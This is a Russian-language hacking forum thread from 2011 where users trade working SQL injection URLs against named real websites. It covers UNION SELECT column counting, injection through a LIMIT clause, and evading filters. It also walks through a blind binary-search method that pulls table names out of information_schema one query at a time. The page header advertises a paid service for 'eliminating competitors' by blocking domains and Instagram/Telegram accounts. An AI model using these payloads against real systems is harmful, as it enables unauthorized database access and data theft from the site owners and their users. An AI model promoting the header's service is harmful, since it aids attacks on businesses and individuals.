УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1717 из 2438

1717

Опции темы

Поиск в этой теме

Опции просмотра

#17161

04.06.2011, 15:40

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Цитата:

Сообщение от XAMEHA

XAMEHA said:
Tigger
, сайт был выложен.
Faaax
, всё там выводиться:

Код:

Code:
http://www.shoptop.ru/sitemap.html?lim1=8252,%208254%20union%20select%20version%28%29,2,3+--+

Инъекция в LIMIT.

Разъяснить, как вы подобрали количество полей

+orde+by+3 +--+

+group+by+3+--+

не проходят, или это простая подстановка +union+select+1,2,3+--+ в запрос

#17162

04.06.2011, 15:59

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от XAMEHA

XAMEHA said:
Tigger
, сайт был выложен.
Faaax
, всё там выводиться:

Код:

Code:
http://www.shoptop.ru/sitemap.html?lim1=8252,%208254%20union%20select%20version%28%29,2,3+--+

Инъекция в LIMIT.

Товарисч сенсей, в MySQL запросах комментарий не обрамляется с обеих сторон пробелами.

Цитата:

Сообщение от FlaktW

FlaktW said:
Разъяснить, как вы подобрали количество полей
+orde+by+3 +--+
+group+by+3+--+
не проходят, или это простая подстановка +union+select+1,2,3+--+ в запрос

В SQLi-иньекциях, которые находятся в LIMIT'e, конструкция ORDER BY не допускается к использованию. Таков синтаксис языка.

Цитата:

Сообщение от XAMEHA

XAMEHA said:
Знаю, так немного удобнее для меня.

Ааа, ну ок. Вопросов больше не имею.

#17163

04.06.2011, 17:16

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Цитата:

Сообщение от Tigger

Tigger said:
В SQLi-иньекциях, которые находятся в LIMIT'e, конструкция ORDER BY не допускается к использованию. Таков синтаксис языка.

Как такие скули, находятся. Запросы типа

http://www.shoptop.ru/sitemap.html?lim1=8252-1

http://www.shoptop.ru/sitemap.html?lim1=8252 and 1=0

http://www.shoptop.ru/sitemap.html?lim1=8252 and true=false

http://www.shoptop.ru/sitemap.html?lim1=8252*1

на нее не указывают

Проги Acunetix Web Vulnerability Scanner, WebCruiser ее не находят

#17164

04.06.2011, 18:04

XAMEHA

Новичок

Регистрация: 15.05.2010

Сообщений: 0

Провел на форуме:
2268

Репутация: 0

Цитата:

Сообщение от FlaktW

Тут сразу видно, что используется limit, поэтому его дописываем, подбираем кол во полей вручную и комментарий.

Цитата:

Сообщение от Tigger

Tigger said:
Товарисч сенсей, в MySQL запросах комментарий не обрамляется с обеих сторон пробелами.

Знаю, так немного удобнее для меня.

#17165

04.06.2011, 18:11

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Цитата:

Сообщение от Faaax

Faaax said:
M_cript
спасибо за помощь
есть ещё вопросик
есть скуля,но в ней фильтруется и and и union

Код:

Code:
http://www.shoptop.ru/sitemap.html?lim1=8250%27%20&&%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56%20#

как обойти фильтрацию union select?

В этом посте явно видно, что использовалось какая-то программа, которая и указала на SQL-inj

#17166

05.06.2011, 04:17

ReV0LVeR

Guest

Сообщений: n/a

Провел на форуме:
11980

Репутация: 1

Код:

Code:
divantvplus.ru/index.html?id=390%20and%201=2+union+select+1,2,3,4,5,6,7,8,9,10,11--+

Не могу разобрать почему отображается так?!

#17167

05.06.2011, 05:15

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

Цитата:

Сообщение от ReV0LVeR

ReV0LVeR said:
Не могу разобрать почему отображается так?!

Потому что значение поля 6 используется скриптом для вывода данных.

http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0 x35,1,1,1,1,1--+

http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0 x36,1,1,1,1,1--+

http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0 x31,1,1,1,1,1--+

http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0 x30,1,1,1,1,1--+

Имеем 4 различных состояния. При использовании бинарного поиска на один символ максимум 4 запроса.

#17168

05.06.2011, 05:30

ReV0LVeR

Guest

Сообщений: n/a

Провел на форуме:
11980

Репутация: 1

Cпасибо! Первый раз с подобным встречаюсь. Что дальше? Можно прямо ссылкой на фак.

#17169

05.06.2011, 06:14

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

Пример получения первого символа запроса "select group_concat(table_name) from information_schema.tables where table_name like '%user%'"

Код:

Code:
http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>128,if(@x>196,0,1),if(@x>64,5,6)),1,1,1,1,1--+

Возвращает страницу 5. Код символа в диапазоне (64;128]

Код:

Code:
http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>96,if(@x>112,0,1),if(@x>80,5,6)),1,1,1,1,1--+

Возвращает страницу 5. Код символа в диапазоне (80;96]

Код:

Code:
http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>88,if(@x>92,0,1),if(@x>84,5,6)),1,1,1,1,1--+

Возвращает страницу 5. Код символа в диапазоне (84;88]

Код:

Code:
http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>86,if(@x>87,0,1),if(@x>85,5,6)),1,1,1,1,1--+

Возвращает страницу 6. Код символа равен 85

#17170

05.06.2011, 06:50

ReV0LVeR

Guest

Сообщений: n/a

Провел на форуме:
11980

Репутация: 1

Объясни мне детально вот эту часть запроса:

Код:

Code:
,1,1))))>128,if(@x>196,0,1),if(@x>64,5,6))

Посимвольно)

Cпасибо.

Страница 1717 из 2438

1717

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход